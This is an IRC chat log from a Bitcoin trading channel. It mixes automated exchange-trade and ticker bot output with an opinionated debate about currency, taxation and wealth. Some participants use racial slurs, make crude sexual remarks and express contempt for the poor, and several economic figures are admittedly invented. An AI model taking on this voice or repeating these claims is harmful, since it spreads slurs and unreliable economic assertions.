06:13:19 they'd send me a minrig. Apr 02 06:13:20 mircea_popescu: As long as the price remains so unstable it's going to be challenged as a day to day currency. Apr 02 06:13:32 thats the only way to prove their legitimate at this point Apr 02 06:13:45 it's a stable diagonal line, thats the best kind right? Apr 02 06:13:54 are bfl still on that world tour 3 month boat cruise thing? Apr 02 06:14:01 Diablo-D3: To send YOU a rig? Apr 02 06:14:10 bgupta: yup. Apr 02 06:14:16 "discovering themselves" Apr 02 06:14:26 [MPEX] [S.BBET] 8 @ 0.00195 = 0.0156 BTC [-] Apr 02 06:14:34 so basically because the usd is an inflationary piece of shit Apr 02 06:14:38 and ciompletely out of control Apr 02 06:14:44 bitcoin is "a bad currency" Apr 02 06:14:49 what nuttery is this ? Apr 02 06:14:57 mircea_popescu: I agree with their assesment Apr 02 06:14:58 [HAVELOCK] [SDICE] 4 @ 0.4359999 = 1.744 BTC [-] Apr 02 06:15:12 if you use USD as the golden standard, Bitcoin is the worst possible currency you could create Apr 02 06:15:18 right. Apr 02 06:15:24 I mean, thats one hell of a backhanded complement Apr 02 06:15:26 also if you use diarhea as a standard Apr 02 06:15:30 jasmine tea is like the worst. Apr 02 06:15:51 well, to be fair Apr 02 06:15:59 [MPEX] [S.MPOE] 30 @ 0.00060272 = 0.0181 BTC [-] Apr 02 06:16:01 if you have actual diarehea, gatoraid would be your best bet Apr 02 06:16:06 if "=PriceMPEX("O.BTCUSD.C310T","S")" used to pull the old options into a spreadsheet, what would I have to change it to for new options? Apr 02 06:16:28 O.USD.C031T Apr 02 06:16:31 if there is a 31 Apr 02 06:16:35 stopping the diarehea isnt a good idea unless they simply cant get fluids back into you fast enough Apr 02 06:16:42 That's one of my functions =/ Apr 02 06:16:52 "=PriceMPEX("O.USD.C031T","S")" Apr 02 06:16:52 and I updated my spreadsheet by the way Apr 02 06:17:18 No such option Apr 02 06:17:37 oh you did Apr 02 06:17:40 032 Apr 02 06:17:44 link pretty plz Apr 02 06:17:51 31s got turned into 32s Apr 02 06:17:57 thx smickles Apr 02 06:18:12 =PriceMPEX("O.BTCUSD.C310T","S") Apr 02 06:18:28 (or 29, depending on which way was better for you) Apr 02 06:18:58 [HAVELOCK] [SDICE] 1 @ 0.436 BTC [+] Apr 02 06:19:12 10.3M bids Apr 02 06:19:27 ;;bids 0 Apr 02 06:19:27 There are currently 35147801 bitcoins demanded at or over 0.0 USD, worth 10305059.9642 USD in total. | Data vintage: 24.6499 seconds Apr 02 06:19:31 word Apr 02 06:19:39 ;;bc,stats Apr 02 06:19:42 Current Blocks: 229233 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 590 blocks | Next Difficulty In About: 2 days, 21 hours, 4 minutes, and 23 seconds | Next Difficulty Estimate: 7678465.63048 | Estimated Percent Change: 14.6754 Apr 02 06:22:44 micea_popescu: what is the purpose of a currency? My understanding is that it is to facilitate day to day commerce. Buying eggs and bread and shit, so people don't have to barter. For this purpose, it sucks. Remember the volitility is not just in one direction.. Apr 02 06:22:52 omg, i love finding math wich is over my head, but seems within my grasp :D *squee# Apr 02 06:23:32 mircea_popescu: ^^ typo.. anyway, that's not to say it can't grow into a good currency Apr 02 06:24:18 bgupta i think you're confusing yourself. Apr 02 06:24:19 [MPEX] [O.USD.C101T] 30 @ 0.23623945 = 7.0872 BTC [+] Apr 02 06:24:25 eggs and bread are not the test case of currency. Apr 02 06:24:41 this is like saying "what is the purpose of a car! to drive on new jersey turnpike!" Apr 02 06:24:49 $oix Apr 02 06:24:53 taxes are the purpose of a currency Apr 02 06:25:00 !ticker ^ OIX Apr 02 06:25:00 Hell, ain't we about more fucked than a whore at closin' time, huh? Apr 02 06:25:05 luckily we have egovpay Apr 02 06:25:11 $vwap ^ Apr 02 06:25:13 smickles: ^OIX 1 day: no data 7 day: average: 100.51048048 high: 132.19074012 low: 86.04499804 volume: 9190 btc: 4514.05164472 30 day: no data Apr 02 06:25:17 i mean saying its purpose is to measure commerce / act as medium of exchange etc is one thing Apr 02 06:25:30 but then to reduce that to such a narrow use seems fallacious. Apr 02 06:25:38 What Currency is http://www.youtube.com/watch?v=R2wDz3mJTlE props to Ukto for the link Apr 02 06:26:06 the kid is actually calm in that video, but he has some wild ones Apr 02 06:26:33 now all that aside : currenlt bitcoin is not workable as a token to buy eggs because a large number of idiots mistakenly refuse to recognise its value. Apr 02 06:26:48 oh jesus, kill it, KILL IT Apr 02 06:27:03 that'll resolve itself soon enough, and then there's the rest of eternity to bitcoin back and forth Apr 02 06:27:27 looks like that chick from larry david, Wanda Apr 02 06:29:12 lol Apr 02 06:29:26 [MPEX] [S.DICE] 2500 @ 0.00378605 = 9.4651 BTC [-] Apr 02 06:30:00 different currencies may be better suited to different things Apr 02 06:30:14 this certainly. Apr 02 06:30:19 my volatility sense is tingling Apr 02 06:30:23 ;;ticker Apr 02 06:30:24 BTCUSD ticker | Best bid: 104.80000, Best ask: 105.00000, Bid-ask spread: 0.20000, Last trade: 105.00000, 24 hour volume: 91538.99833040, 24 hour low: 92.65000, 24 hour high: 106.00000, 24 hour vwap: 100.80654 Apr 02 06:30:44 ;;goxlag Apr 02 06:30:45 4.659735 seconds Apr 02 06:32:02 man Apr 02 06:32:07 hmm, decent # of asks dropping Apr 02 06:32:08 these chats are logged Apr 02 06:32:11 i can't say anything Apr 02 06:32:15 mircea_popescu: it seems bitcoin is redistributing wealth Apr 02 06:32:37 ;;bids 100 Apr 02 06:32:39 There are currently 7136.2212 bitcoins demanded at or over 100.0 USD, worth 726982.251473 USD in total. | Data vintage: 0.0042 seconds Apr 02 06:32:43 ;;bids 90 Apr 02 06:32:43 There are currently 35564.567 bitcoins demanded at or over 90.0 USD, worth 3370512.9669 USD in total. | Data vintage: 4.4431 seconds Apr 02 06:32:55 ;;goxlag Apr 02 06:32:56 0 seconds Apr 02 06:33:01 :o Apr 02 06:35:07 ;;asks 110 Apr 02 06:35:10 There are currently 9755.8082 bitcoins offered at or under 110.0 USD, worth 1053292.16897 USD in total. | Data vintage: 0.0117 seconds Apr 02 06:35:18 yawn Apr 02 06:35:20 good night Apr 02 06:35:22 see you tomorrow 110 Apr 02 06:35:23 see you at 110 Apr 02 06:35:47 7 hours from now Apr 02 06:36:03 taxes are the purpose of a currency <<< actually if we go by historicval recorxd Apr 02 06:36:08 it's paying for the military. Apr 02 06:36:20 at least that's how soldiers got to be called soldiers in the first placer. Apr 02 06:36:24 well thats what taxes are for Apr 02 06:36:47 [MPEX] [S.MPOE] 3420 @ 0.00060272 = 2.0613 BTC [-] Apr 02 06:36:48 [MPEX] [S.MPOE] 15280 @ 0.00061282 = 9.3639 BTC [+] Apr 02 06:37:03 basically. Apr 02 06:37:41 you're right "ORIGIN Middle English: from Old French soldier, from soulde ‘(soldier's) pay,’ from Latin solidus (see solidus). The verb dates from the early 17th cent." Apr 02 06:37:48 mircea_popescu: Ok let's flip this around. What is your definition of a "good currency"? Apr 02 06:38:20 The word soldier entered modern English in the 14th century from the equivalent Middle English word soudeour, from Anglo-French soudeer or soudeour, meaning mercenary, from soudee, meaning shilling's worth or wage, from sou or soud, shilling. Apr 02 06:38:23 militaries may not be as well funded in the future as the united states is today. Apr 02 06:38:33 the roman gold coin was the solidus Apr 02 06:38:35 states' Apr 02 06:38:57 from which sou was eventually derived Apr 02 06:39:22 nice study in inflation, the history of the solidus Apr 02 06:39:55 bgupta you seen the too much money article ? Apr 02 06:40:21 ;;later tell bugpowder exactly. Apr 02 06:40:22 The operation succeeded. Apr 02 06:40:45 toffoo what you thought i was making shit up ? Apr 02 06:40:47 mircea_popescu: Prolly not.. link? Apr 02 06:41:11 http://trilema.com/2012/the-problem-of-too-much-money/ Apr 02 06:41:28 (also links to a good other article) Apr 02 06:41:55 once you've read that my definition will make more sense. it is "a good currency is one that doesn't introduce friction for capital allocation" Apr 02 06:42:10 just like a good baseball bat is one that doesn't lower the batter's average. Apr 02 06:42:35 or golf club or we Apr 02 06:42:36 huh Apr 02 06:42:39 interesting paradigm Apr 02 06:42:52 you can think about money friction as bleeding money off the wealthy into the rest of the population Apr 02 06:43:03 and sort of model it like an entropic thing Apr 02 06:43:29 Where did Bugpowder go? Apr 02 06:43:31 or an ecosystem if you like thinking that way Apr 02 06:43:36 Why do you always scare off Bugpowder mircea_popescu Apr 02 06:43:45 it's an unhealthy ecosystem that only has apex predators Apr 02 06:43:53 i keep it icyhot these niggas benkay Apr 02 06:43:59 s/unhealthy/unstable Apr 02 06:44:08 benkay nah. friction is bleeding money off productive uses into the toilet. Apr 02 06:44:13 to the detriment of all, and especially the poor. Apr 02 06:44:32 the poor support Apr 02 06:44:35 poor? what's a poor Apr 02 06:44:45 what's poor even mean in ecosystem dynamics? Apr 02 06:45:05 the poor is any one individual that does not own enough real property or capital to produce one average wage out of its use alone. Apr 02 06:45:15 if you make 50k a year in rents and interests you're not poor. Apr 02 06:45:21 or w/e average is these days. Apr 02 06:45:39 11ty billion. Apr 02 06:45:42 is skilled labor poor in this paradigm? Apr 02 06:46:03 mircea_popescu? Apr 02 06:46:04 yay tiberiusiv Apr 02 06:46:09 they greatest troll eva Apr 02 06:46:16 benkay yes. Apr 02 06:46:23 well you can't have "rich" without "poor" laboring for their wages Apr 02 06:46:31 who is proposing such a thing ? Apr 02 06:46:35 interesting. because they don't have to work for their income? Apr 02 06:46:43 derp i mean that backwards Apr 02 06:46:48 everyone has to work for their income Apr 02 06:47:05 don't be a pedant, puppeteer. Apr 02 06:47:18 benkay no. because if shit hits the fan they're sol. Apr 02 06:47:50 I prefer to sell hours than rent myself. Apr 02 06:47:58 but that's neither here nor there. Apr 02 06:48:06 so if you're abny good at it eventually you should accumulate enough wealth to not be poor. Apr 02 06:48:22 i get it. Apr 02 06:48:27 of course the socialistoid governments of the uncivilised world would very much prefer a population of poor only. Apr 02 06:48:41 which is why all the anti-getting ahead stuff. Apr 02 06:49:11 what is this anti-getting ahead stuff of which you speak? Apr 02 06:49:16 american pop culture is all about the hustle. Apr 02 06:49:20 mircea_popescu: but that's only the case if you pass wealth down throughout generations Apr 02 06:49:30 benkay have you considered how taxation works in the us for instance ? Apr 02 06:49:33 mircea_popescu: you can't become wealthy in one lifetime Apr 02 06:49:45 the only thingthat's not ok is to get out of the poor into the rich. everytjhing else is fine, Apr 02 06:49:47 i'm listening. Apr 02 06:49:57 but if you get even close to that barrier it's like superficial tension in a water dropplet al oof a sudden Apr 02 06:50:10 thestringpuller sure you can. Apr 02 06:50:30 but certainly the passing down would be one way to do it, and that's why inheritance is taxed to fuck. Apr 02 06:50:43 give gifts before you die Apr 02 06:50:46 and trusts Apr 02 06:50:49 one excellent case study of how bitcoin is irretrievably destroying the socialist paradigm. Apr 02 06:50:54 there are easier ways around death taxes than death itself Apr 02 06:50:57 mind = blown Apr 02 06:51:11 bye bye inheritance tax means the system's lifetime is already capped to about 3 generations. Apr 02 06:51:26 but it will kill welfarism much sooner than that. Apr 02 06:51:27 yeah ex had trust fund via gifting Apr 02 06:51:47 had to forgive $30k/year of debt oslt Apr 02 06:51:58 interesting. i don't know that i buy the numbers behind that argument, but it's interesting. Apr 02 06:52:12 benkay numbers intended for exemplification purposes only. Apr 02 06:52:28 i understand Apr 02 06:52:45 i'm intrigued, sir Apr 02 06:52:54 i'll be running this through the wringer over the coming week Apr 02 06:52:57 another good angle is this : Apr 02 06:53:09 people like buffett, who already made it, come up with "we're not taxed enough" sort of statements. Apr 02 06:53:21 my tiny brain's already leaking, bro Apr 02 06:53:23 chill out Apr 02 06:53:25 the fact is that a. he's only not being taxed because he isn't paying himself a salary (because he doesn't need to) Apr 02 06:53:27 but no i love it Apr 02 06:53:45 and b. his only purpose is to fuck up anyone threatening to join his club. Apr 02 06:54:08 how do those statements accomplish the above, mircea_popescu? Apr 02 06:54:34 very abridgedly : if you have a bn dollars you pay about 3-5% in tax, or w/e you want. Apr 02 06:54:38 in other places you need even less. Apr 02 06:55:05 then politics works as an attempt by the billionaire to use the mob[ile vulgus] as a sort of scarecrow to keep the middle class threading water. Apr 02 06:55:43 how does the system where you don't have socialism work when you have so many poor, though? Apr 02 06:55:43 "more taxes" won't touch buffet any more than the current taxes do. however, it WILL make whatever business less profitable, and thus less able to produce "nouveau riches" Apr 02 06:55:53 i get it i get it Apr 02 06:56:01 wait, you are arguing that fundamentally (assuming one believes that governments need revenue to provid basic services) that there is a reason that the poor should be taxed a higher percentage of their income than the rich? (Basically Buffett's arguement is that current tax system is regressive and that he was being taxed less than his secretary) Apr 02 06:56:16 his argument is disingenous Apr 02 06:56:22 he's paying himself less than his secretary. Apr 02 06:56:36 basically he's saying "hehehe, i can shelter from tax, therefore you should tax those who can't do it more" Apr 02 06:56:51 well what does it matter if his pay comes from investment income or salary? Apr 02 06:56:58 tax system should just copy kickstarter style of doing it Apr 02 06:57:14 voluntary payment? Apr 02 06:57:18 absolutely. Apr 02 06:57:26 and bitcoin will force that, i'm pretty sure. Apr 02 06:57:51 old greek way of doing things. Apr 02 06:57:54 would be cool Apr 02 06:58:00 i'd actually be looking foward to paying taxes Apr 02 06:58:08 putting my money to good use and tracking the progress of it Apr 02 06:58:17 so. how do handle mob in post forced tax environment? Apr 02 06:58:29 why would anyone choice to be the one sucker who is paying taxes. What is the incentive? Apr 02 06:58:38 benkay they learn to serve or to starve, i guess. Apr 02 06:58:51 bgupta that is the problem of the people getting paid. klet them explain it. Apr 02 06:58:54 bgupta: you pay the police to keep the rabble off of your lawn Apr 02 06:59:04 s/choice/choose/ Apr 02 06:59:12 why would anyone be the sucker paying for restaurant meals ? Apr 02 06:59:21 dunno, apparently some people. Apr 02 06:59:26 but individuals would just hope that everyone else pays… it would quickly break down Apr 02 06:59:34 if you propose paying for no service however, that ain't happening and is going away. Apr 02 06:59:48 bgupta i would absolutely not pay a cent for the tsa say Apr 02 06:59:55 so within a few weeks tsa would break down and go away/ Apr 02 06:59:57 wunderbar,. Apr 02 07:00:25 perfect example of marketplace curtailing political idiocy. Apr 02 07:00:40 what about fire department problem? Apr 02 07:00:57 its cured rat Apr 02 07:01:13 hey man, flame off. just counter it calmly. Apr 02 07:01:41 benkay what'd that problem be ? Apr 02 07:01:47 tiberiusiv i don't understand the analogy Apr 02 07:03:00 anyway. if greek remaining bits are any indication, political debate would move to include a large chunk of "let me tell you how much i've donated" Apr 02 07:03:01 right and we let the poor parts of the city burn Apr 02 07:03:03 which'd be nice to see. Apr 02 07:03:05 which is fine most of the time Apr 02 07:03:26 they burn, they get redeveloped into houses for rich people, the poor get to live in as servants Apr 02 07:03:33 except for those times when all of chicago burns down Apr 02 07:03:35 this idea that we're all equal and so forth is pernicious. Apr 02 07:03:43 If all of a sudden income tax was optional.. the central gov't would have NO revenue., and services would revert to neighborhood vigilante services.. think "paying the mob for protection".. I can't see this happening… Apr 02 07:04:20 dunno about that Apr 02 07:04:30 police states are pretty cheap for those at the top relative to the rents extracted Apr 02 07:04:43 send me links Apr 02 07:04:45 benkay@gmail.com Apr 02 07:04:49 bgupta i can, it'd be better than current bs. Apr 02 07:04:59 You're basically proposing anarcocapilast society. Apr 02 07:04:59 i don't know where to even start man. Apr 02 07:05:04 "all politics is local politics" and all that. Apr 02 07:05:07 but it's drinking time. Apr 02 07:05:52 there's currently a trolling technique called "swatting". Apr 02 07:05:55 once capitalist, i think we are now just crapitalist Apr 02 07:06:10 this amply proves why central socialist govt is worse than the mob Apr 02 07:06:12 Ukto: did you fix luke's shit yet? Apr 02 07:06:29 well I can't see it happening in the US, basically the US "mass" citizens will pay taxes if they get what they think they want, and they don't feel that they are being taxed unfairly. Apr 02 07:06:32 (tho the fact that the mob defeats socialist states everywhere, from russia to iran and etc) is pretty good proof of the superiority of the system Apr 02 07:06:42 or moreover, of the incredibly brokedness of socialism as a form of govt. Apr 02 07:06:43 shhhhhh...they're listening. Apr 02 07:06:49 (IE: Unfairly means more than their equivalent neighbor) Apr 02 07:06:52 Diablo-D3: i think they have been claimed. Apr 02 07:07:09 bgupta i guess you get to watch it unfold. Apr 02 07:07:31 Ukto: seriously, what the fuck is with people Apr 02 07:07:33 pretty much the only us citizens that like taxes are those who get a net benefit from govt servicing. Apr 02 07:07:47 Ukto: he didnt even know glbse was shut down last year Apr 02 07:08:14 mircea_popescu: correct. :) Apr 02 07:08:17 You'd be surprised how many that is.. with the gov't borrowing money like mad. Apr 02 07:09:26 swatting? Apr 02 07:09:57 [HAVELOCK] [VTX] 11 @ 0.56885555 = 6.2574 BTC [+] Apr 02 07:11:08 So right now 1btc buys about 500 eggs. Assuming that btc/usd ratio keeps going up to say 1000 in a few years. does that mean I'll be able to buy 5000 eggs with 1btc, or are we expecting massive inflation to kick in, in USD terms, and btc prices to stabilise out? Apr 02 07:11:16 i'm a fan of positive reinforcement trolling Apr 02 07:11:24 If that happens, I'd say btc has graduated into a good currency. Apr 02 07:11:59 bgupta i wouldsay the 500 eggs for 1 btc is mostly an effect of btc price being de facto supressed through ignorance/it being new Apr 02 07:12:27 once btc reflects its true value (ie, fiat M3 / btc m3) you can pretty much count that forever more you'll get an egg for 3 satoshi or w/e that works out to Apr 02 07:14:27 but that would be blockchain spam Apr 02 07:14:33 totally. Apr 02 07:14:48 even with teh 0.005 fee Apr 02 07:14:51 i imagine the way it'd work out in practice is you sell out some satoshi for a wad of zimbabew dollars or w/e Apr 02 07:14:54 and then just spend that Apr 02 07:15:12 at least for eggs Apr 02 07:18:27 So in that case, buying btc, seems akin to buying shares in the new world order. And if we aren't ever envisioning a future where one can buy eggs with btc, (even when 1 btc is worth a wheelbarrow full of fiat) there is a problem. We'll need (and probably will) solve the blockchain spam problem. Apr 02 07:19:08 i would think that's exactly it. buying btc is buying shares in the new world order. Apr 02 07:19:27 you notably can't buy eggs directly with google shares. Apr 02 07:19:34 nor gold Apr 02 07:19:41 but that does not mean that your google shares aren't what your eggs are ultimately bought with Apr 02 07:20:02 right, hence my arguement that it's not really a great currency… but it doesn't have to be to be a great thing to invest in. Apr 02 07:20:08 i guess someone could trade about 3 semi tractor trailers' load of eggs Apr 02 07:20:11 google shares aren't a great currency either Apr 02 07:20:14 for one berskshire hathaway share Apr 02 07:20:18 i never heard of this happening tho. Apr 02 07:20:38 but you mean by currency something that's just a very edge case of what a currency may do Apr 02 07:20:42 that was my original objection. Apr 02 07:20:52 some women masturbate with handguns. Apr 02 07:21:00 while some handguns are more apt for that purpose than others Apr 02 07:21:12 i dunno that many people care about this in a discussion of "a good handgun" Apr 02 07:21:50 undocumented feature Apr 02 07:23:06 incidentally, in most of the world eggs are primarily bought on notebook credit Apr 02 07:23:17 (ie, shop owner has a notebook, marks down your eggs, gets paid once a month) Apr 02 07:23:34 I'm saying that currencies were created to solve the barter systems lack of a of double coincidence of wants. All this wealth, technical progress and all that have been able to be created as a result are just efects of the creation of currency, and not its basic purpose. Apr 02 07:23:58 i would say that's incorrect. Apr 02 07:24:03 currencies were created to pay the military. Apr 02 07:24:16 currencies were created for convenience Apr 02 07:24:36 the original currency unit was worth in the $100k range in today's terms. Apr 02 07:24:48 Really, I thought they paid soldiers in salt, wine and food? Apr 02 07:25:03 what was the original currency unit? Apr 02 07:25:08 solidus, read up we just had this convo. Apr 02 07:25:09 Eve's nani Apr 02 07:25:13 of course if you prefert to go even earlier Apr 02 07:25:29 the greeks were split on the topic. sparta banned all currency Apr 02 07:25:41 athens used it to settle large scale trade, again much like btc is used today. Apr 02 07:26:07 that currency slowly made it's way into the hands of the poor, in ever smaller denominations, sizes and metals, silver, copper, tin Apr 02 07:26:20 does not make the currency "that which is exchanged for one egg" Apr 02 07:27:44 whats the argument on the table? Apr 02 07:28:18 bitcoin is not perfect? Apr 02 07:30:05 i think more of an exploratory "what is bitcoin really" Apr 02 07:34:50 Ok one egg, is a bit.. mmm.. hyperbolic.. you can't really even buy one egg with fiat, in most markets. (They are typically sold by the dozen).. The point is bitcoin isn't rally a good currency right now, but it does have attributes which could allow it to become one.. Apr 02 07:34:53 I was thinking that once the market cap of btc inc. reaches high enough we could see certain countries starting to back fiat with btc, in which case we'd start to see this sort of stuff changing. Apr 02 07:35:35 but it has a long way to go between now and then.. (which is not as impossible as many would want us to believe.) Apr 02 07:35:59 i dont think you can get gov buy-in Apr 02 07:36:02 long way = 10 years ? Apr 02 07:36:06 ever Apr 02 07:36:06 think about it, brazil crisis ? Apr 02 07:36:19 btw how did you calculate that 1 solidus is worth 100,000 usd in today's terms? (Yeah I was thinking 10 years) Apr 02 07:36:24 if something like that happens again, the local scrip is backed by bitcoin instantly. Apr 02 07:36:33 bgupta using my ass. Apr 02 07:36:42 it was something like 32 grams of gold iirc Apr 02 07:37:05 accounting for the rarity of gold/economy differential and everything... i just came up with 100k Apr 02 07:37:22 err 62 solidus to the roman lb or 5.5 g each Apr 02 07:37:52 55 USD per gram of gold. Apr 02 07:38:06 hum, wasn't it much larger ? Apr 02 07:38:14 4 grams in gold is tiny Apr 02 07:38:25 unless this is wrong http://en.wikipedia.org/wiki/Solidus_(coin) Apr 02 07:39:00 well anyway. Apr 02 07:39:16 however one could argue that since 1 solidus was exchangable for 1000 denarii.. then perhaps one can calculate it as worth 1000 x 6.8 grams of silver. Apr 02 07:39:20 the 55 dollar per gram is misleading. they had much less gold available at the time, and different economy. Apr 02 07:39:44 having one of the 100 coins in an empire makes you like a guy having1 of the 100 coins in another empire. Apr 02 07:39:48 so closer to $900 Apr 02 07:39:56 i guess the relative preminence of someone with 100k in the american empire today Apr 02 07:40:07 is comparable to the relative preminence of someone with one solidus in 40 ad Apr 02 07:40:47 can't forget the effect that slavery had on the economy as well. Apr 02 07:40:49 this is pretty much the only way to judge, in my eyes. I don't care about absolutes, i wish to conserve the same percentual value. Apr 02 07:41:12 you guys might be off the deep end here Apr 02 07:41:21 <[\\\]> .bait Apr 02 07:41:35 IE: someone with 1 solidus had infinate more wealth than your average slave in Roman times Apr 02 07:41:54 yeah totally offtopic, my apologies Apr 02 07:42:20 actually i think the 100k is remarkably adequate Apr 02 07:42:41 not trying to moderate, just rubbernecking I guess Apr 02 07:43:58 i mean... richest guy has what, 600k of these 100k dollar coins Apr 02 07:44:05 seems about what the famous rich had at the time too Apr 02 07:45:35 ;;bc,stats Apr 02 07:45:38 Current Blocks: 229247 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 576 blocks | Next Difficulty In About: 2 days, 20 hours, 26 minutes, and 8 seconds | Next Difficulty Estimate: 7702888.16265 | Estimated Percent Change: 15.04014 Apr 02 07:45:56 ;;estimate Apr 02 07:45:57 Next difficulty estimate | 7702888.16265 based on data since last change | 8925421.86613 based on data for last three days Apr 02 07:49:18 mircea_popescu: This articly sorta matches what I am thinking but it uses the term money instead of currency. http://www.businessinsider.com/is-bitcoin-money-2013-4 Apr 02 07:51:03 "start your free trial now" Apr 02 07:51:06 i guess i'll pass Apr 02 07:51:45 start you free trial now? this site isn't a paywall site in the us? Apr 02 07:52:06 i dunno Apr 02 07:52:26 a just a dumbass advertising splahs Apr 02 07:53:00 bah what a mess. Apr 02 07:53:04 well basically... i can't access it. Apr 02 07:53:07 pastebin Apr 02 07:53:12 will do Apr 02 07:54:16 http://pastebin.com/fs3TYZDs Apr 02 07:56:18 ty Apr 02 07:57:43 In the USA, the primary form of money is bank deposits because bank deposits are the form of money that dominate the US payments system. Apr 02 07:57:55 im sorry, i can;'t get past the unfounded assumptions and general illiteracy of the author. Apr 02 08:02:57 [HAVELOCK] [SDICE] 2 @ 0.3943002 = 0.7886 BTC [-] Apr 02 08:02:59 [HAVELOCK] [SDICE] 1 @ 0.39430001 BTC [-] Apr 02 08:03:00 [HAVELOCK] [SDICE] 10 @ 0.3943 = 3.943 BTC [-] Apr 02 08:03:01 [HAVELOCK] [SDICE] 3 @ 0.393 = 1.179 BTC [-] Apr 02 08:03:02 [HAVELOCK] [SDICE] 3 @ 0.393 = 1.179 BTC [-] Apr 02 08:03:03 [HAVELOCK] [SDICE] 2 @ 0.3802 = 0.7604 BTC [-] Apr 02 08:03:05 [HAVELOCK] [SDICE] 3 @ 0.38000001 = 1.14 BTC [-] Apr 02 08:03:06 [HAVELOCK] [SDICE] 9 @ 0.38 = 3.42 BTC [-] Apr 02 08:04:20 [MPEX] [S.MPOE] 11050 @ 0.00060875 = 6.7267 BTC [-] Apr 02 08:04:22 [MPEX] [S.MPOE] 4504 @ 0.00061282 = 2.7601 BTC [+] Apr 02 08:04:23 [MPEX] [S.MPOE] 2846 @ 0.00061414 = 1.7478 BTC [+] Apr 02 08:04:46 btc falling Apr 02 08:05:03 ppcoin doubled again Apr 02 08:05:22 in last 12 hours Apr 02 08:05:22 someone is dumping Apr 02 08:05:30 ;;goxlag Apr 02 08:05:31 75.838911 seconds Apr 02 08:06:41 weird my clark moody is buggin out Apr 02 08:06:57 [HAVELOCK] [VTX] 1 @ 0.55 BTC [-] Apr 02 08:07:42 ;;ticker Apr 02 08:07:43 BTCUSD ticker | Best bid: 102.79189, Best ask: 102.99900, Bid-ask spread: 0.20711, Last trade: 102.99900, 24 hour volume: 100538.63346403, 24 hour low: 93.11000, 24 hour high: 106.00000, 24 hour vwap: 101.13664 Apr 02 08:07:48 still over 100 Apr 02 08:08:05 ya but that is + goxlag + gribble lag Apr 02 08:08:09 so it might we as well 10 Apr 02 08:08:53 maybe im lucky Apr 02 08:09:04 lol Apr 02 08:09:37 100 Apr 02 08:09:41 its gonna be cool when they introduce ltc Apr 02 08:09:52 they won't Apr 02 08:10:04 lag will be for days Apr 02 08:10:30 you think its a joke? Apr 02 08:10:47 btc jokes is funny Apr 02 08:10:48 yeah Apr 02 08:10:58 not necessarily a joke from hox Apr 02 08:11:00 gox Apr 02 08:11:01 it'd be like obama saying 'we just nuked teh shit out of korea' Apr 02 08:11:03 but a joke Apr 02 08:11:08 https://www.bitcoinforum.com/bitcoin-exchange/mt-gox-confirmed-to-start-exchanging-litecoin!-don%27t-miss-the-boat-on-this-one!/ Apr 02 08:11:12 99.90 Apr 02 08:11:17 waiting 24 hours.. jokes niggas Apr 02 08:11:30 no joke Apr 02 08:11:32 99 Apr 02 08:12:41 ThickAsThieves: Where do you get your RT pricing for btc again? Apr 02 08:12:48 http://bitcoin.clarkmoody.com/ Apr 02 08:13:04 when that breaks i try coinlab.com Apr 02 08:13:19 bitcoinity.org/markets Apr 02 08:13:24 #bitcoin-rt Apr 02 08:13:34 mtgoxlive.com (lol) Apr 02 08:13:42 > I cannot officially announce how "soon" "soon" means Apr 02 08:13:45 aka never Apr 02 08:15:02 why would the API already be in place then? Apr 02 08:15:24 for teh fools? Apr 02 08:15:26 when did it first appear? Apr 02 08:16:02 its silly to think Gox would sell ltc imo Apr 02 08:18:00 i need some sleep, plz work on getting btc back to 106 thx Apr 02 08:19:54 I think a lot of money has been spent on LTC today in anticipation Apr 02 08:20:23 increases the chance of tux catchign a bullet I guess Apr 02 08:20:55 i turned 60 LTC into 2.5 BTC it was kinda fun Apr 02 08:21:46 ;;asks 106 Apr 02 08:21:46 There are currently 2445.0987 bitcoins offered at or under 106.0 USD, worth 256822.359423 USD in total. | Data vintage: 111.1200 seconds Apr 02 08:21:55 [MPEX] [S.MPOE] 2154 @ 0.00061414 = 1.3229 BTC [+] Apr 02 08:21:57 [MPEX] [S.MPOE] 4550 @ 0.00061599 = 2.8028 BTC [+] Apr 02 08:21:59 [MPEX] [S.MPOE] 1350 @ 0.00061859 = 0.8351 BTC [+] Apr 02 08:30:44 [MPEX] [S.MPOE] 2750 @ 0.00062045 = 1.7062 BTC [+] Apr 02 08:36:56 [HAVELOCK] [VTX] 20 @ 0.56799999 = 11.36 BTC [+] Apr 02 09:12:31 ;;ticker Apr 02 09:12:32 BTCUSD ticker | Best bid: 102.50000, Best ask: 103.00000, Bid-ask spread: 0.50000, Last trade: 103.00000, 24 hour volume: 105013.69915088, 24 hour low: 93.50000, 24 hour high: 106.00000, 24 hour vwap: 101.19241 Apr 02 09:13:44 ;;wallstreet Apr 02 09:13:44 Error: "wallstreet" is not a valid command. Apr 02 09:14:19 Oh, shit Wall Street ain't found bitcoin yet and we broke $100 Apr 02 09:19:40 lol Apr 02 09:19:46 it's found it jus' fne. Apr 02 09:24:44 btce chat is a riot... Apr 02 09:26:16 http://lolosad.com/wp-content/uploads/2008/10/book-buy-sell-sell-sm.jpg Apr 02 09:43:21 ;;ticker Apr 02 09:43:22 BTCUSD ticker | Best bid: 100.91000, Best ask: 101.00000, Bid-ask spread: 0.09000, Last trade: 100.91000, 24 hour volume: 104235.61913665, 24 hour low: 93.50000, 24 hour high: 106.00000, 24 hour vwap: 101.32202 Apr 02 09:51:55 Maybe someone can help me, who is TheButterZone and do they always want to fuck their customers in the ass? Apr 02 10:23:53 they seem to be one the first amazon stores to accept BTC Apr 02 10:24:40 but they are very new i see Apr 02 10:27:05 ;;ycominator Apr 02 10:27:06 Error: "ycominator" is not a valid command. Apr 02 10:27:15 ;;ycombinator Apr 02 10:27:16 Error: "ycombinator" is not a valid command. Apr 02 10:36:56 [BTCTC] [ASICMINER-PT] 1 @ 0.7559 BTC [+] Apr 02 10:37:02 [BTCTC] [ASICMINER-PT] 6 @ 0.756 = 4.536 BTC [+] Apr 02 10:46:18 ;;wallstreet Apr 02 10:46:19 Error: "wallstreet" is not a valid command. Apr 02 10:46:42 !last m s.dice Apr 02 10:46:42 Last trade for S.DICE on MPEX was at 0.00378605 BTC [-] Apr 02 10:46:52 !last h vtx Apr 02 10:46:53 Last trade for VTX on HAVELOCK was at 0.56799999 BTC [+] Apr 02 10:47:01 ;;ticker Apr 02 10:47:02 BTCUSD ticker | Best bid: 101.80000, Best ask: 101.80002, Bid-ask spread: 0.00002, Last trade: 101.80002, 24 hour volume: 103958.47309302, 24 hour low: 93.50000, 24 hour high: 106.00000, 24 hour 